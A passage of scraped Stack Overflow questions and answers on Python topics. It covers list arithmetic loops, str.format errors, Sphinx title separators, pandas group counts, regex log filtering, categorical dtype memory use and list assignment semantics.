could simply do def calculate_difference(values: list) -> int: first, *other = values return first - calculate_sum(other) Note the *-marker in front of the other variable. When assigning a list two multiple variables, they are "unpacked" by python. Thus a, b, c = [0, 1, 2] would assign 0 to a and so on. However, when we do a, b = [0, 1, 2], then python complains because there are too many variables to unpack in the list (3 > 2). With the asterisk we simply tell python to put all other values, not used so far, into this special variable again. a, b, *rest = [1, 2, 3, 4, 5, 6] is also possible. Ok, computing the product is as easy as summing up, just replace += by *= in the method. And for the quotient we can do the same as for the difference, since a * 1/b * 1/c * 1/d = a / (b*c*d). However, note that if the divisor is zero, python will raise an Error DivisionByZero, as this is not legal. Also, the result of the method is float and no longer int.
Doing math with numbers in a list
i want to be able to add, subtract, divide, multiply etc with integers in a list and in order. I know you can use sum() to add, but i also want to be able to subtract, etc in order... so i tried making a for loop idk if thats the right thing to do, but it doesn't give me the right output and it really confuses me because it really seems like it should work. I was wondering if anyone knows how to fix this or explain why its not giving me the same output as i expected. my_list = [100, 15, 3] for i in my_list: i -= i print(i) # 100 - 15 - 3 = 82 # Wanted output: 82 # Actual output: 0 my_list = [100, 15] for i in my_list: i += i print(i) # 100 + 15 = 115 # Wanted output: 115 # Actual output: 30
[ "There are two main issues with your code:\n\ni can't be your loop variable and the sum, because it will be overwritten all the time. So make two variables.\nYour first task is different from the second. The sum is easy: take all the values of the list and add them, so the order is irrelevant. For your subtraction it's different because you have to take the first value and subtract all others, so it's basically +100-15-3, which means that also the order of the values in the list matter.\n\nThere are more elegant ways to solve it, but for the beginning this should be better to understand.\nmy_list = [100, 15, 3]\n\n\nmy_difference = my_list[0] #initialize with the first value of your list\nmy_list_sub = my_list[1:] #make a new list with the remaining numbers\n\nfor val in my_list_sub:\n my_difference=my_difference-val\nprint(my_difference)\n\n\nmy_list = [100, 15]\nmy_sum = 0 #initialize your sum with 0\n\nfor val in my_list:\n my_sum=my_sum+val\nprint(my_sum)\n\n\n\n", "As others already pointed out: The \"running\"/temporary variable is overwritten in every loop. You can try this out with a simple test:\nfor entry in [0, 'a', 13.37]:\n print(entry) \n\nIt's always a good idea of trying out what happens in simple cases to learn what is going on.\nBut your idea of solving this with a loop is absolutely fine. If you want to re-use this functionallity later, it is also nice to wrap that in a function.\nAssume integer values my_values = [100, 50, 123, 51, 124, 121] in the following examples.\nLets first tacle the sum.\ndef calculate_sum(values: list) -> int:\n result = 0\n for entry in values:\n result += entry\n return result\n\nCheck that it does what we want with\nprint(calculate_sum(my_values))\nprint(sum(my_values))\n\nNow difference is 'almost' like summing up, but you want to sum up all values but the first one, and then compute the difference to the first one (a-b-c-d = a-(b+c+d)). Great, that we have already a method for summing up stuff, so we could simply do\ndef calculate_difference(values: list) -> int:\n first, *other = values\n return first - calculate_sum(other)\n\nNote the *-marker in front of the other variable. When assigning a list two multiple variables, they are \"unpacked\" by python. Thus a, b, c = [0, 1, 2] would assign 0 to a and so on. However, when we do a, b = [0, 1, 2], then python complains because there are too many variables to unpack in the list (3 > 2). With the asterisk we simply tell python to put all other values, not used so far, into this special variable again. a, b, *rest = [1, 2, 3, 4, 5, 6] is also possible.\n\nOk, computing the product is as easy as summing up, just replace += by *= in the method. And for the quotient we can do the same as for the difference, since a * 1/b * 1/c * 1/d = a / (b*c*d). However, note that if the divisor is zero, python will raise an Error DivisionByZero, as this is not legal. Also, the result of the method is float and no longer int.\n" ]
[ 0, 0 ]
[]
[]
[ "for_loop", "python" ]
stackoverflow_0074574492_for_loop_python.txt
Q: Why Python format function is not working? In python I wrote: list_of_assets = [] list_of_assets.append(('A', 'B', 'C')) for asset in list_of_assets: print('{:15} {:30} {:30}'.format([asset[0], asset[1], asset[2]])) But I get: print('{:15} {:30} {:30}'.format([asset[0], asset[1], asset[2]])) TypeError: non-empty format string passed to object.__format__ why is that? A: Don't wrap the format parameters in a list: list_of_assets = [] list_of_assets.append(('A', 'B', 'C')) for asset in list_of_assets: # here ↓ and here ↓ print('{:15} {:30} {:30}'.format(asset[0], asset[1], asset[2])) output: A B C Even better, you could use parameter expansion: for asset in list_of_assets: print('{:15} {:30} {:30}'.format(*asset)) A: The error came because you passed a list argument to the format function. Pass individual elements of the list instead. Your code should be like this: list_of_assets = [] list_of_assets.append(('A', 'B', 'C')) for asset in list_of_assets: print('{:15} {:30} {:30}'.format(asset[0], asset[1], asset[2])) A: Use this code list_of_assets = [] list_of_assets.append(('A', 'B', 'C')) for asset in list_of_assets: print('{:15} {:30} {:30}'.format(asset[0],asset[1],asset[2]))
Why Python format function is not working?
In python I wrote: list_of_assets = [] list_of_assets.append(('A', 'B', 'C')) for asset in list_of_assets: print('{:15} {:30} {:30}'.format([asset[0], asset[1], asset[2]])) But I get: print('{:15} {:30} {:30}'.format([asset[0], asset[1], asset[2]])) TypeError: non-empty format string passed to object.__format__ why is that?
[ "Don't wrap the format parameters in a list:\nlist_of_assets = []\nlist_of_assets.append(('A', 'B', 'C'))\nfor asset in list_of_assets:\n # here ↓ and here ↓\n print('{:15} {:30} {:30}'.format(asset[0], asset[1], asset[2]))\n\noutput:\nA B C \n\nEven better, you could use parameter expansion:\nfor asset in list_of_assets:\n print('{:15} {:30} {:30}'.format(*asset))\n\n", "The error came because you passed a list argument to the format function. Pass individual elements of the list instead.\nYour code should be like this:\nlist_of_assets = []\nlist_of_assets.append(('A', 'B', 'C'))\nfor asset in list_of_assets:\n print('{:15} {:30} {:30}'.format(asset[0], asset[1], asset[2]))\n\n", "Use this code\nlist_of_assets = []\nlist_of_assets.append(('A', 'B', 'C'))\nfor asset in list_of_assets:\n print('{:15} {:30} {:30}'.format(asset[0],asset[1],asset[2]))\n\n" ]
[ 2, 1, 0 ]
[]
[]
[ "format", "python", "python_3.x" ]
stackoverflow_0070582950_format_python_python_3.x.txt
Q: How to modify html title separator in Sphinx doc generator By default it seems to what to use a long dash '--' as the separator between page title and overall site html_title that's set in the config.py file. We'd like to change this to a '|' character instead. I can add a block to the layout.html template to modify the title I'm just unsure of what to actually write for that. I want it to be 'page_title | html_title' in the title tags across the site. A: The em dash (&#8212;) comes from the layout.html template: {%- if not embedded and docstitle %} {%- set titlesuffix = " &#8212; "|safe + docstitle|e %} {%- else %} {%- set titlesuffix = "" %} {%- endif %} The value of titlesuffix is used a bit further down in the template: {%- block htmltitle %} <title>{{ title|striptags|e }}{{ titlesuffix }}</title> {%- endblock %} To customize: Ensure that you have templates_path = ['_templates'] in conf.py. Create a file called layout.html in the _templates directory. In layout.html, add the following: {% extends "!layout.html" %} {%- set customtitlesuffix = " | "|safe + docstitle|e %} {%- block htmltitle %} <title>{{ title|striptags|e }}{{ customtitlesuffix }}</title> {%- endblock %} See also https://www.sphinx-doc.org/en/master/templating.html.
How to modify html title separator in Sphinx doc generator
By default it seems to what to use a long dash '--' as the separator between page title and overall site html_title that's set in the config.py file. We'd like to change this to a '|' character instead. I can add a block to the layout.html template to modify the title I'm just unsure of what to actually write for that. I want it to be 'page_title | html_title' in the title tags across the site.
[ "The em dash (&#8212;) comes from the layout.html template:\n{%- if not embedded and docstitle %}\n{%- set titlesuffix = \" &#8212; \"|safe + docstitle|e %}\n{%- else %}\n{%- set titlesuffix = \"\" %}\n{%- endif %}\n\nThe value of titlesuffix is used a bit further down in the template:\n{%- block htmltitle %}\n<title>{{ title|striptags|e }}{{ titlesuffix }}</title>\n{%- endblock %}\n\nTo customize:\n\nEnsure that you have templates_path = ['_templates'] in conf.py.\n\nCreate a file called layout.html in the _templates directory.\n\nIn layout.html, add the following:\n{% extends \"!layout.html\" %}\n\n{%- set customtitlesuffix = \" | \"|safe + docstitle|e %}\n\n{%- block htmltitle %}\n<title>{{ title|striptags|e }}{{ customtitlesuffix }}</title>\n{%- endblock %}\n\n\n\nSee also https://www.sphinx-doc.org/en/master/templating.html.\n" ]
[ 1 ]
[]
[]
[ "documentation", "html", "python", "python_sphinx" ]
stackoverflow_0074564451_documentation_html_python_python_sphinx.txt
Q: Count the frequency that a value occurs in a dataframe (multiple column) I want to count the frequency of a value that are same in 2 column, also adding a column at the end that display the counting number & delete the first cloumn. The dataframe I have | Column A | Column B | Column C | | -------- | -------- | -------- | | Column A | Cat | Fish | | Column A | Cat | Apple | | Column A | Cat | Apple | | Column A | Dog | Lemon | | Column A | Dog | Fish | | Column A | Dog | Fish | The expected outcome is like | Column A | Column B | Column C | | -------- | -------- | -------- | | Cat | Fish | 1 | | Cat | Apple | 2 | | Dog | Lemon | 1 | | Dog | Fish | 2 | I have tried the df['Column B'].value_counts() But I don't know to handle 2 cloumn at the same time. A: You can use GroupBy.count : out = ( df.groupby(["Column B", "Column C"], as_index=False, sort=False) ["Column A"].count() ) # Output : print(out) Column B Column C Column A 0 Cat Fish 1 1 Cat Apple 2 2 Dog Lemon 1 3 Dog Fish 2
Count the frequency that a value occurs in a dataframe (multiple column)
I want to count the frequency of a value that are same in 2 column, also adding a column at the end that display the counting number & delete the first cloumn. The dataframe I have | Column A | Column B | Column C | | -------- | -------- | -------- | | Column A | Cat | Fish | | Column A | Cat | Apple | | Column A | Cat | Apple | | Column A | Dog | Lemon | | Column A | Dog | Fish | | Column A | Dog | Fish | The expected outcome is like | Column A | Column B | Column C | | -------- | -------- | -------- | | Cat | Fish | 1 | | Cat | Apple | 2 | | Dog | Lemon | 1 | | Dog | Fish | 2 | I have tried the df['Column B'].value_counts() But I don't know to handle 2 cloumn at the same time.
[ "You can use GroupBy.count :\nout = (\n df.groupby([\"Column B\", \"Column C\"],\n as_index=False, sort=False)\n [\"Column A\"].count()\n )\n\n# Output :\nprint(out)\n Column B Column C Column A\n0 Cat Fish 1\n1 Cat Apple 2\n2 Dog Lemon 1\n3 Dog Fish 2\n\n" ]
[ 1 ]
[]
[]
[ "pandas", "python" ]
stackoverflow_0074575361_pandas_python.txt
Q: Python - Search a list of a group strings in text file I want to search a list of group of strings inside a text file (.txt or .log). it must include group A or B (or CDE..). group A OR B each words need in the same line but not near by. (eg. ["123456", "Login"] or ["123457", "Login"] if in the same line then save it to a new txt file. Some of example output line: 20221110,1668057560.965,AE111,123457,0,"Action=Account Login,XXX,XXX",XXX,XXX 20221110,1668057560.965,AE112,123458,0,"Action=Account Login,XXX,XXX",XXX,XXX 20221111,1668057560.965,AE113,123458,0,"Action=Order,XXX,XXX",XXX,XXX below is my code: import os, re path = "Log\\" file_list = [path + f for f in os.listdir(path) if f.endswith('.log')] keep_phrases1 = ["123456", "Login"] keep_phrases2 = ["123457", "Login"] pat = r"\b.*?\b".join([re.escape(word) for word in keep_phrases1]) pat = re.compile(r"\b" + pat + r"\b") pat2 = r"\b.*?\b".join([re.escape(word) for word in keep_phrases2]) pat2 = re.compile(r"\b" + pat2 + r"\b") print(pat2,pat) if len(file_list) != 0: for infile in sorted(file_list): with open(infile, encoding="latin-1") as f: f = f.readlines() for line in f: found1 = pat.search(line) found2 = pat2.search(line) if found1 or found2: with open(outfile, "a") as wf: wf.write(line) It's works for me but not easy to add more group of words. And I think the code is not good for understand? My problems is How can I simplify the code? How can I easier to add other group to search? e.g. ["123458", "Login"] ["123456", "order"] ["123457", "order"] A: import os, re path = "Log\\" file_list = [path + f for f in os.listdir(path) if f.endswith('.log')] All keep_phrases in a container, I choose a dictionary but since they are identified by order, it could have been a list: keep_phrases = {'keep_phrases1': ["123456", "Login"], 'keep_phrases2':["123457", "Login"]} # Alternative, a list would work: # keep_phrases = [["123456", "Login"], ["123457", "Login"]] Now let's generate a list with the compiled patterns: def compile_pattern(keep_phrase): pat = r"\b.*?\b".join([re.escape(word) for word in keep_phrase]) pat = re.compile(r"\b" + pat + r"\b") return pat patterns = [compile_pattern(keep_phrases[keep_phrase]) for keep_phrase in keep_phrases.keys()] # if keep_phrases had been a list, we would do # patterns = [compile_pattern(keep_phrase) for keep_phrase in keep_phrases] Finally, we look for matches for every pattern and if we get any finding, we write to file. if len(file_list) != 0: for infile in sorted(file_list): with open(infile, encoding="latin-1") as f: f = f.readlines() for line in f: findings = [pat.search(line) for pat in patterns] # can do this because there's a list with patterns if any(findings): with open(outfile, "a") as wf: wf.write(line) A: Try, this. I read the whole file in a string to make code fast and readable, findall will return a list with all matching lines for the file. If memory is a problem the pattern also works on individual lines: import re file_list=["sit.txt"] keep_phrases=[["123456", "Login"],["123457", "Login"]] pat = [r"(?:.*?(?:" + p1 + r"\b.*?"+p2+r".*?(?:\n|$)))" for p1,p2 in keep_phrases] pat= r"|".join(pat) for infile in sorted(file_list): with open(infile, encoding="latin-1") as f: text=f.read() print(re.findall(pat,text)) A: Without regex def match_words(line, words): return all(word in words for word in line) with open(infile, encoding="latin-1") as f: f = f.readlines() for line in f: split_line = line.split(",") if any( match_words(split_line , word) for word in [keep_phrases1, keep_phrases2]): with open(outfile, "a") as wf: wf.write(line)
Python - Search a list of a group strings in text file
I want to search a list of group of strings inside a text file (.txt or .log). it must include group A or B (or CDE..). group A OR B each words need in the same line but not near by. (eg. ["123456", "Login"] or ["123457", "Login"] if in the same line then save it to a new txt file. Some of example output line: 20221110,1668057560.965,AE111,123457,0,"Action=Account Login,XXX,XXX",XXX,XXX 20221110,1668057560.965,AE112,123458,0,"Action=Account Login,XXX,XXX",XXX,XXX 20221111,1668057560.965,AE113,123458,0,"Action=Order,XXX,XXX",XXX,XXX below is my code: import os, re path = "Log\\" file_list = [path + f for f in os.listdir(path) if f.endswith('.log')] keep_phrases1 = ["123456", "Login"] keep_phrases2 = ["123457", "Login"] pat = r"\b.*?\b".join([re.escape(word) for word in keep_phrases1]) pat = re.compile(r"\b" + pat + r"\b") pat2 = r"\b.*?\b".join([re.escape(word) for word in keep_phrases2]) pat2 = re.compile(r"\b" + pat2 + r"\b") print(pat2,pat) if len(file_list) != 0: for infile in sorted(file_list): with open(infile, encoding="latin-1") as f: f = f.readlines() for line in f: found1 = pat.search(line) found2 = pat2.search(line) if found1 or found2: with open(outfile, "a") as wf: wf.write(line) It's works for me but not easy to add more group of words. And I think the code is not good for understand? My problems is How can I simplify the code? How can I easier to add other group to search? e.g. ["123458", "Login"] ["123456", "order"] ["123457", "order"]
[ "import os, re\npath = \"Log\\\\\"\nfile_list = [path + f for f in os.listdir(path) if f.endswith('.log')]\n\nAll keep_phrases in a container, I choose a dictionary but since they are identified by order, it could have been a list:\nkeep_phrases = {'keep_phrases1': [\"123456\", \"Login\"], 'keep_phrases2':[\"123457\", \"Login\"]}\n\n# Alternative, a list would work:\n# keep_phrases = [[\"123456\", \"Login\"], [\"123457\", \"Login\"]]\n\nNow let's generate a list with the compiled patterns:\ndef compile_pattern(keep_phrase):\n pat = r\"\\b.*?\\b\".join([re.escape(word) for word in keep_phrase])\n pat = re.compile(r\"\\b\" + pat + r\"\\b\")\n return pat\n\npatterns = [compile_pattern(keep_phrases[keep_phrase]) for keep_phrase in keep_phrases.keys()]\n\n# if keep_phrases had been a list, we would do\n# patterns = [compile_pattern(keep_phrase) for keep_phrase in keep_phrases]\n\nFinally, we look for matches for every pattern and if we get any finding, we write to file.\nif len(file_list) != 0:\n for infile in sorted(file_list):\n with open(infile, encoding=\"latin-1\") as f:\n f = f.readlines()\n for line in f:\n findings = [pat.search(line) for pat in patterns] # can do this because there's a list with patterns\n if any(findings):\n with open(outfile, \"a\") as wf:\n wf.write(line)\n\n", "Try, this. I read the whole file in a string to make code fast and readable, findall will return a list with all matching lines for the file.\nIf memory is a problem the pattern also works on individual lines:\nimport re\n\nfile_list=[\"sit.txt\"]\n\nkeep_phrases=[[\"123456\", \"Login\"],[\"123457\", \"Login\"]]\n\npat = [r\"(?:.*?(?:\" + p1 + r\"\\b.*?\"+p2+r\".*?(?:\\n|$)))\" for p1,p2 in keep_phrases]\npat= r\"|\".join(pat)\n\nfor infile in sorted(file_list):\n with open(infile, encoding=\"latin-1\") as f:\n text=f.read()\n print(re.findall(pat,text))\n\n\n", "Without regex\ndef match_words(line, words):\n return all(word in words for word in line)\n\nwith open(infile, encoding=\"latin-1\") as f:\n f = f.readlines()\n for line in f:\n split_line = line.split(\",\")\n if any( match_words(split_line , word) for word in [keep_phrases1, keep_phrases2]):\n with open(outfile, \"a\") as wf:\n wf.write(line)\n\n\n" ]
[ 0, 0, 0 ]
[]
[]
[ "python", "python_re", "txt" ]
stackoverflow_0074568196_python_python_re_txt.txt
Q: When should I use pandas' Categorical dtype? My question concerns optimizing memory usage for pandas Series. The docs note, The memory usage of a Categorical is proportional to the number of categories plus the length of the data. In contrast, an object dtype is a constant times the length of the data. My understanding is that pandas Categorical data is effectively a mapping to unique (downcast) integers that represent categories, where the integers themselves occupy (presumably) fewer bytes than the strings that make up the object dtype. My question: is there any rule-of-thumb for when using pd.Categorical will not save memory over object? How direct is the aforementioned proportionality, and doesn't it also depend on the length of each element (string) in the Series? In the test below, pd.Categorical seems to win by a long shot. import string import matplotlib.pyplot as plt import numpy as np import pandas as pd np.random.seed(444) %matplotlib inline def mem_usage(obj, index=False, total=True, deep=True): """Memory usage of pandas Series or DataFrame.""" # Ported from https://www.dataquest.io/blog/pandas-big-data/ usg = obj.memory_usage(index=index, deep=deep) if isinstance(obj, pd.DataFrame) and total: usg = usg.sum() # Bytes to megabytes return usg / 1024 ** 2 catgrs = tuple(string.printable) lengths = np.arange(1, 10001, dtype=np.uint16) sizes = [] for length in lengths: obj = pd.Series(np.random.choice(catgrs, size=length)) cat = obj.astype('category') sizes.append((mem_usage(obj), mem_usage(cat))) sizes = np.array(sizes) fig, ax = plt.subplots() ax.plot(sizes) ax.set_ylabel('Size (MB)') ax.set_xlabel('Series length') ax.legend(['object dtype', 'category dtype']) ax.set_title('Memory usage of object vs. category dtype') Albeit, for n<125, pd.Categorical is slightly larger. fig, ax = plt.subplots() ax.plot(sizes[:200]) ax.set_ylabel('Size (MB)') ax.set_xlabel('Series length') ax.legend(['object dtype', 'category dtype']) ax.set_title('Memory usage of object vs. category dtype') A: categorical astype uses less memory. However one hot encoding allows you to maintain categorical ranking of the level. you can analyze the classifier coefficients to understand behavior and predictions on the categorical data. A: is there any rule-of-thumb for when using pd.Categorical will not save memory over object? I would say : "no" And to be extreme: "opinion based" In both cases, a strict use case context should be given. What happens if your categorical data is built from complex objects, or long strings, or very big numbers (hashes) ? or from a pd.cut complex function ? What is total nb of rows of your data ? 1_000 ? 100_000 ? 10_000_000_000 ? What is the ratio category/nb_of_data ? is it stable from one data set to the other ? The following code tries to observe where the 2 curves intersect with different categorical data string length values and different ratios nb_categories / nb of data. import hashlib import itertools import math import sys from pathlib import Path import matplotlib.pyplot as plt import numpy as np import pandas as pd import seaborn as sns from tqdm import tqdm np.random.seed(444) def mem_usage(obj, index=False, total=True, deep=True): """Memory usage of pandas Series or DataFrame.""" # Ported from https://www.dataquest.io/blog/pandas-big-data/ usg = obj.memory_usage(index=index, deep=deep) if isinstance(obj, pd.DataFrame) and total: usg = usg.sum() # Bytes to megabytes return usg / 1024 ** 2 def do_test(max_dataset_length): lengths = np.arange(1, max_dataset_length, dtype=np.uint16) obj_vals = [] cat_vals = [] for length in tqdm(lengths, desc="generate samples"): obj = pd.Series(np.random.choice(categories, size=length)) cat = obj.astype('category') obj_vals.append(mem_usage(obj)) cat_vals.append(mem_usage(cat)) objs_arr = np.array(obj_vals) cats_arr = np.array(cat_vals) arr = objs_arr - cats_arr first_zero_index = (arr > 0).argmax(axis=0) # index of intersection between the 2 data sets return first_zero_index results_path = Path.cwd() / "results.csv" if results_path.exists(): results_df = pd.read_csv(results_path, index_col=0) results_df.to_csv(results_path) else: i = 1 l_cat_nbs = [10, 100, 500] # , 1_000, 2_000, 5_000] # l_hash_func = [hashlib.sha1, hashlib.sha3_512] l_cat_data_ratios = [0.1, 0.2, 0.5, 0.7, 0.9] l_hash_sizes = [4, 16, 32, 64, 128] measure_cat_str_len = [] measure_cat_size = [] measure_nb_samples = [] measure_ratios = [] measure_threshold = [] measure_nb_cats = [] hash_function = hashlib.sha3_512 all_hashes = [hash_function(bytes(e)).hexdigest() for e in tqdm(np.random.random_sample(max(l_cat_nbs)), desc="generate hashes")] for nb_cat, hash_size in itertools.product( # hash_function l_cat_nbs, l_hash_sizes # l_hash_func ): categories = [e[:hash_size] for e in all_hashes] example_hash = categories[0] original_cat_size = sys.getsizeof(example_hash) original_cat_str_len = len(example_hash) print(f"{hash_function.__name__} => {example_hash} - len={original_cat_str_len} - size={original_cat_size}") cat_df = pd.DataFrame({"hash": categories}) cat_df["cat"] = cat_df["hash"].astype('category') print(f"Category mem size={sys.getsizeof(cat_df['cat'].dtype)}") for ratio in l_cat_data_ratios: max_length = int(math.floor(nb_cat / ratio)) if threshold := do_test(max_dataset_length=max_length): measure_nb_cats.append(nb_cat) measure_cat_str_len.append(original_cat_str_len) measure_cat_size.append(original_cat_size) measure_nb_samples.append(max_length) measure_ratios.append(ratio) measure_threshold.append(threshold) results_df = pd.DataFrame( {"original cat str len" : measure_cat_str_len, "original cat data size" : measure_cat_size, "nb samples" : measure_nb_samples, "nb cat / nb samples ratio": measure_ratios, "nb samples threshold" : measure_threshold, "nb cat" : measure_nb_cats } ) results_df.to_csv(results_path) results_df["nb cat / nb samples ratio"] = results_df["nb cat / nb samples ratio"].astype('category') g = sns.FacetGrid( results_df, col="nb cat / nb samples ratio", ) g.map(sns.lineplot, "original cat data size", "nb samples threshold") g.map(sns.scatterplot, "original cat data size", "nb samples threshold") plt.show() original cat data size : memory size of the original categorical data (hash hex string of various sizes) Which gives: Categorical is just a way of expressing a kind of enum with some additional data and properties (see the link you gave : https://pandas.pydata.org/docs/user_guide/categorical.html => semantics, ordering, ...). When nb_cat ~= nb_elements, which seems to be the worst case scenario according to pandas' doc, then one can start to wonder : what's the category useful for when there is 1 category per data value ? colA colA_catagorical 1 1 2 2 3 3 ... ... n n # eeeeew ! The rest is "in between", hence my "no"/"opinion based" answer. Only a specific benchmark on your own use case may give some useful insight, and some sense of scalability of the possible implementation choices. The pandas' doc speaks specifically of the string => categorical transformation, because it is probably the most common case where some raw string input (CSV, JSON, from external API, tool, lab measurment machine, ...) is transformed into a DataFrame, and some columns are indeed categorical. The other cases maybe pd.cut, pd.qcut and similar, but how likely is the result predictable for optimization purposes ?
When should I use pandas' Categorical dtype?
My question concerns optimizing memory usage for pandas Series. The docs note, The memory usage of a Categorical is proportional to the number of categories plus the length of the data. In contrast, an object dtype is a constant times the length of the data. My understanding is that pandas Categorical data is effectively a mapping to unique (downcast) integers that represent categories, where the integers themselves occupy (presumably) fewer bytes than the strings that make up the object dtype. My question: is there any rule-of-thumb for when using pd.Categorical will not save memory over object? How direct is the aforementioned proportionality, and doesn't it also depend on the length of each element (string) in the Series? In the test below, pd.Categorical seems to win by a long shot. import string import matplotlib.pyplot as plt import numpy as np import pandas as pd np.random.seed(444) %matplotlib inline def mem_usage(obj, index=False, total=True, deep=True): """Memory usage of pandas Series or DataFrame.""" # Ported from https://www.dataquest.io/blog/pandas-big-data/ usg = obj.memory_usage(index=index, deep=deep) if isinstance(obj, pd.DataFrame) and total: usg = usg.sum() # Bytes to megabytes return usg / 1024 ** 2 catgrs = tuple(string.printable) lengths = np.arange(1, 10001, dtype=np.uint16) sizes = [] for length in lengths: obj = pd.Series(np.random.choice(catgrs, size=length)) cat = obj.astype('category') sizes.append((mem_usage(obj), mem_usage(cat))) sizes = np.array(sizes) fig, ax = plt.subplots() ax.plot(sizes) ax.set_ylabel('Size (MB)') ax.set_xlabel('Series length') ax.legend(['object dtype', 'category dtype']) ax.set_title('Memory usage of object vs. category dtype') Albeit, for n<125, pd.Categorical is slightly larger. fig, ax = plt.subplots() ax.plot(sizes[:200]) ax.set_ylabel('Size (MB)') ax.set_xlabel('Series length') ax.legend(['object dtype', 'category dtype']) ax.set_title('Memory usage of object vs. category dtype')
[ "categorical astype uses less memory. However one hot encoding allows you to maintain categorical ranking of the level. you can analyze the classifier coefficients to understand behavior and predictions on the categorical data.\n", "\nis there any rule-of-thumb for when using pd.Categorical will not save memory over object?\n\nI would say : \"no\"\nAnd to be extreme: \"opinion based\"\nIn both cases, a strict use case context should be given.\n\nWhat happens if your categorical data is built from complex objects, or long strings, or very big numbers (hashes) ?\nor from a pd.cut complex function ?\nWhat is total nb of rows of your data ? 1_000 ? 100_000 ? 10_000_000_000 ?\nWhat is the ratio category/nb_of_data ? is it stable from one data set to the other ?\n\nThe following code tries to observe where the 2 curves intersect with different categorical data string length values and different ratios nb_categories / nb of data.\nimport hashlib\nimport itertools\nimport math\nimport sys\nfrom pathlib import Path\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom tqdm import tqdm\n\nnp.random.seed(444)\n\n\ndef mem_usage(obj, index=False, total=True, deep=True):\n \"\"\"Memory usage of pandas Series or DataFrame.\"\"\"\n # Ported from https://www.dataquest.io/blog/pandas-big-data/\n usg = obj.memory_usage(index=index, deep=deep)\n if isinstance(obj, pd.DataFrame) and total:\n usg = usg.sum()\n # Bytes to megabytes\n return usg / 1024 ** 2\n\n\ndef do_test(max_dataset_length):\n lengths = np.arange(1, max_dataset_length, dtype=np.uint16)\n obj_vals = []\n cat_vals = []\n for length in tqdm(lengths, desc=\"generate samples\"):\n obj = pd.Series(np.random.choice(categories, size=length))\n cat = obj.astype('category')\n obj_vals.append(mem_usage(obj))\n cat_vals.append(mem_usage(cat))\n objs_arr = np.array(obj_vals)\n cats_arr = np.array(cat_vals)\n arr = objs_arr - cats_arr\n first_zero_index = (arr > 0).argmax(axis=0) # index of intersection between the 2 data sets\n return first_zero_index\n\n\nresults_path = Path.cwd() / \"results.csv\"\n\nif results_path.exists():\n results_df = pd.read_csv(results_path, index_col=0)\n results_df.to_csv(results_path)\nelse:\n i = 1\n l_cat_nbs = [10, 100, 500] # , 1_000, 2_000, 5_000]\n # l_hash_func = [hashlib.sha1, hashlib.sha3_512]\n l_cat_data_ratios = [0.1, 0.2, 0.5, 0.7, 0.9]\n l_hash_sizes = [4, 16, 32, 64, 128]\n measure_cat_str_len = []\n measure_cat_size = []\n measure_nb_samples = []\n measure_ratios = []\n measure_threshold = []\n measure_nb_cats = []\n hash_function = hashlib.sha3_512\n all_hashes = [hash_function(bytes(e)).hexdigest() for e in\n tqdm(np.random.random_sample(max(l_cat_nbs)), desc=\"generate hashes\")]\n for nb_cat, hash_size in itertools.product( # hash_function\n l_cat_nbs,\n l_hash_sizes\n # l_hash_func\n ):\n\n categories = [e[:hash_size] for e in all_hashes]\n example_hash = categories[0]\n original_cat_size = sys.getsizeof(example_hash)\n original_cat_str_len = len(example_hash)\n print(f\"{hash_function.__name__} => {example_hash} - len={original_cat_str_len} - size={original_cat_size}\")\n cat_df = pd.DataFrame({\"hash\": categories})\n cat_df[\"cat\"] = cat_df[\"hash\"].astype('category')\n print(f\"Category mem size={sys.getsizeof(cat_df['cat'].dtype)}\")\n for ratio in l_cat_data_ratios:\n max_length = int(math.floor(nb_cat / ratio))\n if threshold := do_test(max_dataset_length=max_length):\n measure_nb_cats.append(nb_cat)\n measure_cat_str_len.append(original_cat_str_len)\n measure_cat_size.append(original_cat_size)\n measure_nb_samples.append(max_length)\n measure_ratios.append(ratio)\n measure_threshold.append(threshold)\n\n results_df = pd.DataFrame(\n {\"original cat str len\" : measure_cat_str_len,\n \"original cat data size\" : measure_cat_size,\n \"nb samples\" : measure_nb_samples,\n \"nb cat / nb samples ratio\": measure_ratios,\n \"nb samples threshold\" : measure_threshold,\n \"nb cat\" : measure_nb_cats\n }\n )\n results_df.to_csv(results_path)\n\nresults_df[\"nb cat / nb samples ratio\"] = results_df[\"nb cat / nb samples ratio\"].astype('category')\ng = sns.FacetGrid(\n results_df,\n col=\"nb cat / nb samples ratio\",\n)\ng.map(sns.lineplot, \"original cat data size\", \"nb samples threshold\")\ng.map(sns.scatterplot, \"original cat data size\", \"nb samples threshold\")\nplt.show()\n\n\n\noriginal cat data size : memory size of the original categorical data (hash hex string of various sizes)\n\nWhich gives:\n\n\nCategorical is just a way of expressing a kind of enum with some additional data and properties (see the link you gave : https://pandas.pydata.org/docs/user_guide/categorical.html => semantics, ordering, ...).\nWhen nb_cat ~= nb_elements, which seems to be the worst case scenario according to pandas' doc, then one can start to wonder :\n\nwhat's the category useful for when there is 1 category per data value ?\n\ncolA colA_catagorical\n1 1\n2 2\n3 3\n... ...\nn n\n# eeeeew !\n\nThe rest is \"in between\", hence my \"no\"/\"opinion based\" answer.\nOnly a specific benchmark on your own use case may give some useful insight, and some sense of scalability of the possible implementation choices.\nThe pandas' doc speaks specifically of the string => categorical transformation, because it is probably the most common case where some raw string input (CSV, JSON, from external API, tool, lab measurment machine, ...) is transformed into a DataFrame, and some columns are indeed categorical.\nThe other cases maybe pd.cut, pd.qcut and similar, but how likely is the result predictable for optimization purposes ?\n" ]
[ 0, 0 ]
[]
[]
[ "categorical_data", "memory", "pandas", "python" ]
stackoverflow_0048256395_categorical_data_memory_pandas_python.txt
Q: How do Assignment Operators and Lists Work? - Python The assignment operator appears to work differently for lists than it does for integers: >>> list1 = [1,2,3,4,5] >>> newlist1 = list1 >>> print(id(list1)) 140282759536448 >>> print(id(newlist1)) 140282759536448 >>> newlist1.append(6) >>> print(id(newlist1)) 140282759536448 >>> print(list1) [1, 2, 3, 4, 5, 6] >>> print(newlist1) [1, 2, 3, 4, 5, 6] The Assignment Operator works in a similar way with integers: >>> int1 = 1 >>> newint1 = int1 >>> print(id(int1)) 140282988331248 >>> print(id(newint1)) 140282988331248 But modifying one of the integers creates a new ID: >>> newint1 = newint1 + 1 >>> print(id(newint1)) 140282988331280 >>> print(id(int1)) 140282988331248 Why does modifying a list not create a new ID? As well, how would you create a new ID for a list? A: You should use newlist1 = list1.copy() because when you do newlist1 = list1 you are not creating new list you are referencing the same list A: In Python, when you assign a list to a new variable, you will only pass the address of the list to it. That is why the id()function return the same value. If you want to actually copy the list you have to use the 